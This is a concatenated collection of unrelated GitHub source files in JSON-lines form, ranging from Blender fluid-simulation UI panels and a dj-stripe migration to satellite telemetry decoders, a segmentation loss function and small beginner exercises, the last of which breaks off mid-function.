text=\"\")\n\n #col.label(text=\"Effector Group:\")\n #col.prop(domain, \"effector_group\", text=\"\")\n\n col = split.column()\n col.label(text=\"Collision Group:\")\n col.prop(domain, \"collision_group\", text=\"\")\n\nclass PHYSICS_PT_manta_cache(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Cache\"\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n rd = context.scene.render\n return md and (md.smoke_type == 'DOMAIN') and (rd.engine in cls.COMPAT_ENGINES)\n\n def draw(self, context):\n layout = self.layout\n md = context.smoke\n domain = context.smoke.domain_settings\n\n split = layout.split()\n split.prop(domain, \"cache_directory\", text=\"\")\n\n row = layout.row(align=True)\n row.prop(domain, \"cache_frame_start\")\n row.prop(domain, \"cache_frame_end\")\n\n split = layout.split()\n\n row = layout.row(align=True)\n row.label(text=\"Data file format:\")\n row.prop(domain, \"cache_data_format\", text=\"\")\n\n if md.domain_settings.smoke_domain_type in {'GAS'}:\n if domain.use_noise:\n row = layout.row(align=True)\n row.label(text=\"Noise file format:\")\n row.prop(domain, \"cache_noise_format\", text=\"\")\n\n if md.domain_settings.smoke_domain_type in {'LIQUID'}:\n # File format for all particle systemes (FLIP and secondary)\n row = layout.row(align=True)\n row.label(text=\"Particle file format:\")\n row.prop(domain, \"cache_particle_format\", text=\"\")\n\n if domain.use_mesh:\n row = layout.row(align=True)\n row.label(text=\"Mesh file format:\")\n row.prop(domain, \"cache_mesh_format\", text=\"\")\n\n row = layout.row()\n row.operator(\"manta.make_file\", text=\"Export Mantaflow Script\")\n\nclass PHYSICS_PT_manta_field_weights(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Field Weights\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n rd = context.scene.render\n return md and (md.smoke_type == 'DOMAIN') and (rd.engine in cls.COMPAT_ENGINES)\n\n def draw(self, context):\n domain = context.smoke.domain_settings\n effector_weights_ui(self, context, domain.effector_weights, 'SMOKE')\n\nclass PHYSICS_PT_manta_display_settings(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Display Settings\"\n bl_options = {'DEFAULT_CLOSED'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n\n rd = context.scene.render\n return md and (md.smoke_type == 'DOMAIN') and (not rd.use_game_engine) and (md.domain_settings.smoke_domain_type in {'GAS'})\n\n def draw(self, context):\n domain = context.smoke.domain_settings\n layout = self.layout\n\n layout.prop(domain, \"display_thickness\")\n\n layout.separator()\n layout.label(text=\"Slicing:\")\n layout.prop(domain, \"slice_method\")\n\n slice_method = domain.slice_method\n axis_slice_method = domain.axis_slice_method\n\n do_axis_slicing = (slice_method == 'AXIS_ALIGNED')\n do_full_slicing = (axis_slice_method == 'FULL')\n\n row = layout.row()\n row.enabled = do_axis_slicing\n row.prop(domain, \"axis_slice_method\")\n\n col = layout.column()\n col.enabled = not do_full_slicing and do_axis_slicing\n col.prop(domain, \"slice_axis\")\n col.prop(domain, \"slice_depth\")\n\n row = layout.row()\n row.enabled = do_full_slicing or not do_axis_slicing\n row.prop(domain, \"slice_per_voxel\")\n\n layout.separator()\n layout.label(text=\"Debug:\")\n layout.prop(domain, \"draw_velocity\")\n col = layout.column()\n col.enabled = domain.draw_velocity\n col.prop(domain, \"vector_draw_type\")\n col.prop(domain, \"vector_scale\")\n\n layout.separator()\n layout.label(text=\"Color Mapping:\")\n layout.prop(domain, \"use_color_ramp\")\n col = layout.column()\n col.enabled = domain.use_color_ramp\n col.prop(domain, \"coba_field\")\n col.template_color_ramp(domain, \"color_ramp\", expand=True)\n\nclasses = (\n MANTA_MT_presets,\n PHYSICS_PT_manta,\n PHYSICS_PT_manta_flow_source,\n PHYSICS_PT_manta_flow_advanced,\n PHYSICS_PT_manta_adaptive_domain,\n PHYSICS_PT_manta_quality,\n PHYSICS_PT_manta_noise,\n PHYSICS_PT_manta_mesh,\n PHYSICS_PT_manta_particles,\n PHYSICS_PT_manta_diffusion,\n PHYSICS_PT_manta_guiding,\n PHYSICS_PT_manta_groups,\n PHYSICS_PT_manta_cache,\n PHYSICS_PT_manta_field_weights,\n PHYSICS_PT_manta_display_settings,\n)\n\nif __name__ == \"__main__\": # only for live edit.\n from bpy.utils import register_class\n for cls in classes:\n register_class(cls)\n","repo_name":"hbcbh1999/BlenderMantaflow","sub_path":"release/scripts/startup/bl_ui/properties_physics_smoke.py","file_name":"properties_physics_smoke.py","file_ext":"py","file_size_in_byte":34345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"23963491094","text":"survey = [\"What is your name?\",\"What is your horoscope?\",\"What is your lucky number?\",\"What is your favorite ice cream flavor?\",\"What is your favorite food?\"]\r\nkey = [\"key1\", \"key2\", \"key3\", \"key4\", \"key5\"]\r\n\r\nfor i in range(len(survey)):\r\n key[i] = input(survey[i])\r\n\r\nanswers = {\r\n \"name\": key[0],\r\n \"horoscope\": key[1],\r\n \"lucky number\": key[2],\r\n \"favorite ice cream flavor\": key[3],\r\n \"favorite food\": key[4]\r\n}\r\n\r\nanswerKey = [\"key1\", \"key2\", \"key3\", \"key4\", \"key5\"]\r\n\r\nresults = {\r\n \"name\": answerKey[0],\r\n \"horoscope\": answerKey[1],\r\n \"lucky number\": answerKey[2],\r\n \"favorite ice cream flavor\": answerKey[3],\r\n \"favorite food\": answerKey[4]\r\n}\r\n\r\n\r\ny = \"true\"\r\nwhile y:\r\n ans = input(\"Would you like to take the survey again?\")\r\n\r\n if ans.lower() == \"no\":\r\n print(\"Sure, we will show you your answers!\")\r\n print (answers)\r\n break\r\n else:\r\n print(\"Sure, we will provide you the survey again!\")\r\n for i in range(len(survey)):\r\n answerKey[i] = input(survey[i])\r\n print ( answers, results)\r\n continue\r\n","repo_name":"td-dana/data","sub_path":"dictionarypt2.py","file_name":"dictionarypt2.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25819354370","text":"from pandas import Series\nfrom pandas import DataFrame\n#1 Series对象创建与操作\nlist1=[1,2,3,4]\ntuple1=(5,6,7,8)\ndict1={\"wyh\":18,\"ww\":18}\nser1=Series(list1)\nser2=Series(tuple1,index=[3,1,2,4])\nser3=Series(dict1)\nprint(ser1,ser2,ser3)\n\n#2 DataFrame对象创建与操作\nobj={'name':['wyh','cx'],\n 'age':['20','18'],\n 'status':['student','student']}\ndf=DataFrame(obj)\ndf['gender']=['m','m']\ndel df['status']\nprint(df.head(),df.age,df.T)\n\n","repo_name":"OswaldZero/pythonLearning","sub_path":"da_pandas.py","file_name":"da_pandas.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9918240016","text":"from turtle import Turtle\nMOVEMENT = 20\n\nclass Paddle(Turtle):\n def __init__(self, start_position):\n super().__init__()\n self.penup()\n self.shape(\"square\")\n self.color(\"white\")\n self.shapesize(stretch_len=1, stretch_wid=5)\n self.speed(\"fastest\")\n self.goto(start_position)\n \n def go_up(self):\n self.goto(self.xcor(), self.ycor() + MOVEMENT)\n \n def go_down(self):\n self.goto(self.xcor(), self.ycor() - MOVEMENT)\n","repo_name":"amygurski/100-days-of-python","sub_path":"day-22-pong/paddle.py","file_name":"paddle.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11156401187","text":"from pathlib import Path\n\nimport django.db.models.deletion\nfrom django.db import migrations\n\nimport djstripe.fields\n\n\ndef get_sql_for_connection(schema_editor, direction: str) -> str:\n \"\"\"\n Returns the vendor and the collection of SQL Statements depending on:\n\n 1. The SQL Engine\n 2. Direction of Migrations: forward or Backward\n \"\"\"\n vendor = schema_editor.connection.vendor\n # Construct Path to SQL\n file_path = Path(__file__).parent / \"sql\" / f\"migrate_{vendor}_{direction}.sql\"\n try:\n sql_statement = Path(file_path).read_text()\n except FileNotFoundError as error:\n # In case it's oracle or some other django supported db that we do not support yet.\n raise RuntimeError(\n f\"We currently do not support {vendor}. Please open an issue at https://github.com/dj-stripe/dj-stripe/issues/new?assignees=&labels=discussion&template=feature-or-enhancement-proposal.md&title= if you'd like it supported.\",\n ) from error\n return vendor, sql_statement\n\n\ndef forwards_func(apps, schema_editor):\n vendor, sql_statement = get_sql_for_connection(schema_editor, \"forward\")\n with schema_editor.connection.cursor() as cursor:\n if vendor == \"sqlite\":\n cursor.executescript(sql_statement)\n else:\n cursor.execute(sql_statement)\n\n\ndef reverse_func(apps, schema_editor):\n vendor, sql_statement = get_sql_for_connection(schema_editor, \"backward\")\n with schema_editor.connection.cursor() as cursor:\n if vendor == \"sqlite\":\n cursor.executescript(sql_statement)\n else:\n cursor.execute(sql_statement)\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n (\"djstripe\", \"0012_2_8\"),\n ]\n operations = [\n migrations.RunPython(forwards_func, reverse_func),\n migrations.AlterField(\n model_name=\"payout\",\n name=\"destination\",\n field=djstripe.fields.PaymentMethodForeignKey(\n null=True,\n on_delete=django.db.models.deletion.PROTECT,\n to=\"djstripe.djstripepaymentmethod\",\n ),\n ),\n ]\n","repo_name":"Hu-Wentao/dj-stripe","sub_path":"djstripe/migrations/0013_2_8a.py","file_name":"0013_2_8a.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"1660789861","text":"from unittest import TestCase\n\nfrom find_sale_in_wish_list.headless_chrome import HeadlessChrome\nfrom lambda_handler.notifier import get_kindle_books, on_event\nimport lambda_handler.director_of_system\nimport os\n\n\nclass TestNotifier(TestCase):\n\n def test_get_kindle_books(self):\n event = {\n 'wish_list_url': 'http://amzn.asia/4jy4esM',\n 'expired': 1545440835,\n 'user_id': '92676047-1ce7-4080-bd44-10e3fc63a16d',\n 'description': 'マンガ',\n 'threshold': {\n 'discount_rate': 20,\n 'points': 20\n }\n }\n try:\n headless_chrome = HeadlessChrome()\n get_kindle_books(event, headless_chrome)\n headless_chrome.driver.close()\n except:\n self.fail()\n\n\nclass TestDirectorOfSystem(TestCase):\n\n def test_lambda_handler(self):\n os.environ['NOTIFIER'] = 'sale-develop-Notifier-1LLOIPVQ8DQPF'\n event = {\n 'wish_list_url': 'http://amzn.asia/4jy4esM',\n 'expired': 1545440835,\n 'user_id': '92676047-1ce7-4080-bd44-10e3fc63a16d',\n 'description': 'マンガ',\n 'threshold': {\n 'discount_rate': 20,\n 'points': 20\n }\n }\n try:\n lambda_handler.director_of_system.invoke_lambda(event)\n except:\n self.fail()\n","repo_name":"homura10059/find_sale_in_wishlist","sub_path":"tests/test_lambda_handler.py","file_name":"test_lambda_handler.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15672383951","text":"'''Faça um programa que peça ao usuario uma palavra ou frase,e crie uma segunda string cujo conteudo é o inverso do informado'''\n\nnormal = input(\"palavra:\")\ninverso = \"\"\nfor c in normal:\n inverso = c + inverso\n\nprint(normal)\nprint(inverso)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"GuilhermeCostaLima/ALPC2","sub_path":"Strings/EXextra3.py","file_name":"EXextra3.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"75329757127","text":"import argparse\nimport datetime as dt\nimport logging\nimport pathlib\nimport shlex\n\nfrom hashlib import sha256\n\nimport construct\nimport gnuradio as gr\nimport gnuradio.gr\nimport pmt\n\nfrom satellites import filereceiver as grs_filereceivers\nfrom satellites.components import datasinks as grs_datasinks\nfrom satellites.components.datasinks.file_receiver import file_receiver as GrsFileReceiver\nfrom satellites.core import gr_satellites_flowgraph as grs_flowgraph\nfrom satellites.filereceiver.filereceiver import File as GrsFile\nfrom satellites import telemetry as grs_tlm\n\nfrom sats_receiver import utils\nfrom sats_receiver.systems.satellites import telemetry as sr_tlm\nfrom sats_receiver.systems.satellites import filereceivers as sr_filereceivers\nfrom sats_receiver.systems.satellites import demodulators as sr_demod\n\n\nclass SatFlowgraph(grs_flowgraph):\n @classmethod\n def add_options(cls, parser, file=None, name=None, norad=None):\n super().add_options(parser, file, name, norad)\n\n data_options = parser.add_argument_group('data sink')\n TlmDecoder.add_options(data_options)\n for i in dir(grs_datasinks):\n if not (i.startswith('__') or i.endswith('__')):\n ds = getattr(grs_datasinks, i)\n if hasattr(ds, 'add_options'):\n ds.add_options(data_options)\n\n p_output = parser.add_argument_group('output')\n p_output.add_argument('--hexdump', action='store_true')\n\n def __init__(self, log, samp_rate=None, options=None,\n file=None, name=None, norad=None, tlm_decode=False, is_iq=True):\n self.log = log\n self.tlm_decode = tlm_decode\n self._demodulator_hooks['GFSK'] = sr_demod.GfskDemod\n self._demodulator_hooks['GMSK'] = sr_demod.GmskDemod\n\n if type(options) is str:\n p = argparse.ArgumentParser(prog=self.__class__.__name__,\n conflict_handler='resolve')\n self.add_options(p, file, name, norad)\n options = p.parse_args(shlex.split(options))\n\n super().__init__(file=file, name=name, norad=norad,\n samp_rate=samp_rate, options=options,\n iq=is_iq, grc_block=0)\n\n def _init_datasink(self, key, info):\n if 'decoder' in info:\n ds = getattr(grs_datasinks, info['decoder'])\n try:\n x = ds(options=self.options)\n except TypeError: # raised if ds doesn't have an options parameter\n x = ds()\n elif 'telemetry' in info:\n x = TlmDecoder(info['telemetry'], self.log, options=self.options, tlm_decode=self.tlm_decode)\n elif 'files' in info:\n x = FileReceiver(info['files'], verbose=False, options=self.options)\n elif 'image' in info:\n x = FileReceiver(info['image'], verbose=False, display=False, fullscreen=False, options=self.options)\n else:\n x = TlmDecoder('raw', self.log, options=self.options)\n\n self._datasinks[key] = x\n\n def _init_additional_datasinks(self):\n pass\n\n def get_files(self) -> dict[str, dict[str, GrsFile]]:\n return {k: v.get_files()\n for k, v in self._datasinks.items()}\n\n def clean(self):\n for ds in self._datasinks.values():\n ds.clean()\n\n\nclass TlmDecoder(gr.gr.basic_block):\n def __init__(self, dname: str, log: logging.Logger, options=None, tlm_decode=False):\n super().__init__(\n 'raw_receiver',\n in_sig=[],\n out_sig=[])\n self.message_port_register_in(pmt.intern('in'))\n self.set_msg_handler(pmt.intern('in'), self.handle_msg)\n\n self.fmt = getattr(grs_tlm, dname, None)\n if self.fmt is None and dname != 'raw':\n self.fmt = getattr(sr_tlm, dname)\n\n self.log = log\n self.dname = dname\n self.tlm_decode = tlm_decode\n self.out_dir = pathlib.Path(options.file_output_path)\n self._files: dict[str, GrsFile] = {}\n\n def handle_msg(self, msg_pmt):\n msg = pmt.cdr(msg_pmt)\n if not pmt.is_u8vector(msg):\n self.log.debug('TlmDecoder: Received invalid message type. Expected u8vector')\n return\n\n packet = bytes(pmt.u8vector_elements(msg))\n meta = pmt.car(msg_pmt)\n transmitter = pmt.dict_ref(meta, pmt.intern('transmitter'), pmt.PMT_NIL)\n if pmt.is_symbol(transmitter):\n transmitter = pmt.symbol_to_string(transmitter)\n else:\n transmitter = str(transmitter)\n\n fn_base = '_'.join((self.dname, transmitter, dt.datetime.now().isoformat(),\n sha256(packet).hexdigest()[:16])).replace(' ', '-').replace('.', ',')\n\n try:\n tlm = self.fmt.parse(packet)\n except construct.ConstructError as e:\n self.log.debug('TlmDecoder: Could not parse telemetry beacon: %s', e)\n return\n\n try:\n if not (tlm and self.fmt.build(tlm)):\n return\n except:\n return\n\n f = GrsFile((self.out_dir / fn_base).with_suffix('.bin'))\n f.f.write(packet)\n to_close = [f.f]\n f.size = len(packet)\n self._files[f.path.name] = f\n\n if self.tlm_decode:\n tlmf = GrsFile((self.out_dir / fn_base).with_suffix('.txt'))\n tlm = str(tlm)\n tlmf.f.write(tlm.encode('utf-8'))\n to_close.append(tlmf.f)\n tlmf.size = len(tlm)\n self._files[tlmf.path.name] = tlmf\n\n utils.close(*to_close)\n\n @classmethod\n def add_options(cls, parser):\n parser.add_argument('--file_output_path', default='.')\n\n def get_files(self):\n return self._files\n\n def clean(self):\n self._files = {}\n\n\nclass FileReceiver(GrsFileReceiver):\n def __init__(self, receiver, path=None, verbose=None,\n options=None, **kwargs):\n gr.gr.basic_block.__init__(\n self,\n 'file_receiver',\n in_sig=[],\n out_sig=[])\n if verbose is None:\n if options is not None:\n verbose = options.verbose_file_receiver\n else:\n raise ValueError(\n 'Must indicate verbose in function arguments or options')\n if path is None:\n if options is not None:\n path = options.file_output_path\n else:\n raise ValueError(\n 'Must indicate path in function arguments or options')\n self.message_port_register_in(pmt.intern('in'))\n self.set_msg_handler(pmt.intern('in'), self.handle_msg)\n\n x = getattr(grs_filereceivers, receiver, None)\n if x is None:\n x = getattr(sr_filereceivers, receiver)\n self.receiver = x(path, verbose, **kwargs)\n\n def get_files(self):\n return self.receiver._files\n\n def clean(self):\n self.receiver._files = {}\n","repo_name":"baskiton/sats-receiver","sub_path":"sats_receiver/systems/satellites/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6956,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"71730412488","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n找出列表中大写开头的(去除空格后)和int型,并按照原来的索引顺序返回新列表\n['Ha', 'World', 666, 8, 5, 'Python', u'Www']\n'''\n\nalist = ['Ha', ' hello', 'World ', 666, 8, 'de', '12', 5, 'Python', u'Www']\ncopy_list = alist[:]\n\n\ndef int_list(alist):\n item_index = dict()\n ret = dict()\n for index, item in enumerate(alist):\n item_index.update({item: index})\n # print (item_index)\n # 找出列表中大写开头的(去除空格后)和int型,并返回新列表\n int_list = [int(numstr) for numstr in [\n intnum for intnum in alist if isinstance(intnum, int)]] # int_str_list\n ret['item_index'] = item_index\n ret['int_list'] = int_list\n return ret\n# print (int_list)\n# print \"#######int_list\"\n\n\ndef filter_list(alist, int_item_dict):\n #[8, 5, 'World', 'Python']\n int_list = int_item_dict['int_list']\n for j in int_list:\n alist.remove(j)\n # print alist\n # [item for item in alist if item.strip().istitle()] #newlist\n # int元素和istitle元素组成新的列表\n int_list.extend([item for item in alist if item.strip().istitle()])\n return int_list\n\n\n\ndef sort_index_list(int_str_list, int_item_dict):\n index_list = []\n item_index = int_item_dict['item_index']\n # print item_index\n for key in int_str_list:\n index_list.append(item_index[key])\n sort_indexlist = sorted(index_list)\n return sort_indexlist\n\n\ndef int_and_stripstr(sort_indexlist,copy_list):\n ret = []\n for i in sort_indexlist:\n if isinstance(copy_list[i], int):\n ret.append(copy_list[i])\n elif isinstance(copy_list[i], basestring):\n ret.append(copy_list[i].strip())\n else:\n pass\n return ret\n\n\ndef main(alist):\n int_lists = int_list(alist)\n int_str_list = filter_list(alist, int_lists)\n sort_indexlist = sort_index_list(int_str_list, int_lists)\n ret = int_and_stripstr(sort_indexlist,copy_list)\n return ret\n\nif __name__ == '__main__':\n res = main(alist)\n print(res)","repo_name":"imoyao/code-snippets","sub_path":"codes/list_test/filter_int_and_str_item_list.py","file_name":"filter_int_and_str_item_list.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"74247256969","text":"import os\nimport gzip\nimport cPickle as pickle\nimport shelve\n\nallchars = shelve.open('/home/zr/letters/allchars_dict2')\n\nTSEK_APPR_MEAN = 19.5 # Fudge -- for use with Nyinggyud in particular.\n\ndef load_pkl_page(pkl_path):\n if os.path.exists(pkl_path):\n fl = gzip.open(pkl_path)\n return pickle.Unpickler(fl).load()\n\ndef construct_content(info):\n content = []\n for i, char in enumerate(info[:-1]):\n content.append(allchars['label_chars'][char[2]])\n if info[i+1][0] == char[0] +1:\n content.append(u'\\n')\n elif info[i+1][3] - char[4] >= TSEK_APPR_MEAN *2:\n content.append(u' ')\n content.append(allchars['label_chars'][info[-1][2]])\n return ''.join(content)","repo_name":"zmr/namsel","sub_path":"utils_extra/page_construct.py","file_name":"page_construct.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"16"} +{"seq_id":"73319577608","text":"from typing import Optional, List\r\nfrom functools import partial\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom torch.nn.modules.loss import _Loss\r\nfrom ._functional import focal_loss_with_logits\r\nfrom ._functional import soft_dice_score, to_tensor\r\nfrom .constants import BINARY_MODE, MULTICLASS_MODE, MULTILABEL_MODE\r\n\r\nfrom . import base\r\nfrom . import functional as F_dice\r\nfrom ..base.modules import Activation\r\n\r\n__all__ = [\"FocalDiceLoss\"]\r\n\r\nclass FocalDiceLoss(_Loss):\r\n\r\n def __init__(\r\n self,\r\n mode: str,\r\n tradeoff: 0.5,\r\n # focal loss\r\n alpha: Optional[float] = None,\r\n gamma: Optional[float] = 2.,\r\n ignore_index: Optional[int] = None, \r\n reduction: Optional[str] = \"mean\",\r\n normalized: bool = False,\r\n reduced_threshold: Optional[float] = None,\r\n # dice loss\r\n eps=1., beta=1., activation=None, ignore_channels=None, **kwargs\r\n ):\r\n \"\"\"Compute Focal loss\r\n\r\n Args:\r\n mode: Loss mode 'binary', 'multiclass' or 'multilabel'\r\n alpha: Prior probability of having positive value in target.\r\n gamma: Power factor for dampening weight (focal strength).\r\n ignore_index: If not None, targets may contain values to be ignored.\r\n Target values equal to ignore_index will be ignored from loss computation.\r\n normalized: Compute normalized focal loss (https://arxiv.org/pdf/1909.07829.pdf).\r\n reduced_threshold: Switch to reduced focal loss. Note, when using this mode you should use `reduction=\"sum\"`.\r\n \r\n Shape\r\n - **y_pred** - torch.Tensor of shape (N, C, H, W)\r\n - **y_true** - torch.Tensor of shape (N, H, W) or (N, C, H, W)\r\n\r\n Reference\r\n https://github.com/BloodAxe/pytorch-toolbelt\r\n\r\n \"\"\"\r\n assert mode in {BINARY_MODE, MULTILABEL_MODE, MULTICLASS_MODE}\r\n super().__init__()\r\n\r\n self.mode = mode\r\n self.ignore_index = ignore_index\r\n self.focal_loss_fn = partial(\r\n focal_loss_with_logits,\r\n alpha=alpha,\r\n gamma=gamma,\r\n reduced_threshold=reduced_threshold,\r\n reduction=reduction,\r\n normalized=normalized,\r\n )\r\n\r\n self.eps = eps\r\n self.beta = beta\r\n self.activation = Activation(activation)\r\n self.ignore_channels = ignore_channels\r\n self.tradeoff = tradeoff\r\n\r\n def aggregate_loss(self, loss):\r\n return loss.mean()\r\n\r\n def compute_score(self, output, target, smooth=0.0, eps=1e-7, dims=None) -> torch.Tensor:\r\n return soft_dice_score(output, target, smooth, eps, dims)\r\n\r\n def forward(self, y_pred: torch.Tensor, y_true: torch.Tensor) -> torch.Tensor:\r\n\r\n y_pred_dice_loss = self.activation(y_pred)\r\n y_true_dice_loss = y_true\r\n\r\n dice_loss = 1 - F_dice.jaccard(\r\n y_pred_dice_loss, y_true_dice_loss,\r\n eps=self.eps,\r\n threshold=None,\r\n ignore_channels=self.ignore_channels,\r\n )\r\n\r\n if self.mode in {BINARY_MODE, MULTILABEL_MODE}:\r\n y_true = y_true.view(-1)\r\n y_pred = y_pred.view(-1)\r\n\r\n if self.ignore_index is not None:\r\n # Filter predictions with ignore label from loss computation\r\n not_ignored = y_true != self.ignore_index\r\n y_pred = y_pred[not_ignored]\r\n y_true = y_true[not_ignored]\r\n\r\n loss = self.focal_loss_fn(y_pred, y_true)\r\n\r\n elif self.mode == MULTICLASS_MODE:\r\n \r\n num_classes = y_pred.size(1)\r\n\r\n # dice loss\r\n\r\n loss = 0\r\n\r\n # Filter anchors with -1 label from loss computation\r\n if self.ignore_index is not None:\r\n not_ignored = y_true != self.ignore_index\r\n\r\n for cls in range(num_classes):\r\n #cls_y_true = (y_true == cls).long()\r\n cls_y_pred = y_pred[:, cls, ...]\r\n cls_y_true = y_true[:, cls, ...]\r\n\r\n if self.ignore_index is not None:\r\n cls_y_true = cls_y_true[not_ignored]\r\n cls_y_pred = cls_y_pred[not_ignored]\r\n\r\n loss = loss + self.tradeoff*self.focal_loss_fn(cls_y_pred, cls_y_true) + (1-self.tradeoff)*dice_loss\r\n\r\n return loss\r\n","repo_name":"thoang02/DL-for-biomedical-images","sub_path":"segmentation_models_pytorch/losses/focal_dice.py","file_name":"focal_dice.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29715286756","text":"import json\nfrom janome.tokenizer import Tokenizer\n\nimport numpy as np\nfrom scipy import stats\n\ndef main():\n with open('data.json', 'r', encoding='utf-8') as json_file:\n json_dict = json.load(json_file)\n texts = []\n for json_key in json_dict:\n texts.append(json_key['detail'].replace('\\n', ''))\n\n\n t = Tokenizer()\n\n result = list()\n for rank in range(len(texts)):\n kind = []\n text = t.tokenize(texts[rank],wakati=True)\n type = 0\n for word in text:\n if not word in kind:\n kind.append(word)\n type += 1\n result.append({'rank': rank + 1, 'type': type})\n\n # print('all: ' + str(all))\n # print('average: ' + str(all / len(texts)))\n\n first = np.empty(50)\n second = np.empty(50)\n\n for rank in range(50):\n first[rank:rank+1] = result[rank]['type']\n\n for index in range(50):\n second[index:index+1] = result[index + 50]['type']\n\n # print(first)\n # print(second)\n print(stats.ttest_ind(first, second))\n #Ttest_indResult(statistic=0.23367427377675823, pvalue=0.8157252926627823)\n # -> 有意義とはいえない。\n #\nif __name__ == '__main__':\n main()\n","repo_name":"mitsumizo/python_analisis","sub_path":"analisis.py","file_name":"analisis.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2737518953","text":"\nfrom src.core.services.cities.contract import CityService\nfrom src.core.services.cities.contract.CityRepository import CityRepository\nfrom src.infrastructure.persistence import DBSession\nfrom src.infrastructure.persistence.UnitOfWork import UnitOfWork\n\n\nclass CityAPPService(CityService.CityService):\n \"\"\"\n This class is responsible for creating a new City\n \"\"\"\n\n def __init__(self, repository: CityRepository, unitOfWork: UnitOfWork):\n self.repository = repository\n self.unitOfWork = unitOfWork\n\n def add(self, city, province_id):\n with self.unitOfWork as uow:\n if self.repository.exits_name(city, province_id) is False:\n city_model = self.repository.save(city, province_id)\n uow.session.add(city_model)\n uow.session.commit()\n uow.session.refresh(city_model)\n id = city_model.city_id\n uow.session.close()\n return id\n else:\n raise Exception(\"City %s already exists\" % city)\n\n def get(self, city_id):\n return self.repository.get(city_id)\n","repo_name":"fardad2222/Clean-Architecture","sub_path":"src/core/services/cities/CityAppService.py","file_name":"CityAppService.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26681744355","text":"def api():\n from . import load_api_spec\n return load_api_spec('crawlers/kraken.yaml')\n\ndef get_pair_ohlc(pair, metrics, frequency, begin, end):\n global kraken\n if type(metrics) is list:\n metrics = ','.join(metrics)\n import requests\n resp = requests.get(api().ohlc_data(assets=pair, metrics=metrics, frequency=frequency, since=0))\n rj = resp.json()\n result = rj['data']\n import time\n if 'next_page_url' in rj:\n while True:\n time.sleep(0.5)\n resp = requests.get(rj['next_page_url'])\n rj = resp.json()\n result += rj['data']\n if not 'next_page_url' in rj:\n break\n return result\n\n\ndef get_bootstrap_data(symbol, currency):\n from . import bootstrap_index, load_transformer\n _convert_map = {\n 'btc':'xbt',\n 'doge':'xdg'\n }\n if symbol in _convert_map:\n symbol = _convert_map[symbol]\n if currency in _convert_map:\n currency = _convert_map[currency]\n try:\n index = bootstrap_index('../data/bootstrap/index.yaml')\n transformer = load_transformer('../data/bootstrap/' + index.kraken.transformer)\n if index.kraken.groups:\n raise ValueError('Groups are not supported for kraken Loader')\n filename = index.kraken.name_format.format(symbol=symbol.upper(), currency=currency.upper()) + '.csv'\n return transformer.get_df('../data/bootstrap/' + index.kraken.zipfile, filename)\n except Exception as e:\n print('Exception occurred! ' + str(e))\n raise\n\n\ndef ticks_to_ohlcv(ticks, interval):\n resample = ticks.resample(interval)\n ohlc = resample['price'].ohlc()\n ohlc['volume'] = resample['amount'].sum()\n return ohlc","repo_name":"RedLicorice/cryptoml","sub_path":"src/crawlers/kraken.py","file_name":"kraken.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"10348976074","text":"# Given a matrix of m x n elements (m rows, n columns), return all elements of\n# the matrix in spiral order.\n#\n# For example,\n# Given the following matrix:\n#\n# [\n# [ 1, 2, 3 ],\n# [ 4, 5, 6 ],\n# [ 7, 8, 9 ]\n# ]\n# You should return [1,2,3,6,9,8,7,4,5].\n\n# The thing is to restrict the list of the for sides: up bound, right bound,\n# down bound, left bound. Each time finish one strip, update the corresponding\n# bound. if the bound goes to the strip that has been scanned, means job done,\n# return the result\n\ndef spiralOrder(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: List[int]\n \"\"\"\n rt = []\n m = len(matrix)\n if m == 0:\n return rt\n n = len(matrix[0])\n\n u, r, d, l = 0, n - 1, m - 1, 0\n while True:\n for col in range(l, r + 1, 1):\n rt.append(matrix[u][col])\n u += 1\n if u > d:\n break\n for row in range(u, d + 1, 1):\n rt.append(matrix[row][r])\n r -= 1\n if r < l:\n break\n for col in range(r, l - 1, -1):\n rt.append(matrix[d][col])\n d -= 1\n if d < u:\n break\n for row in range(d, u - 1, -1):\n 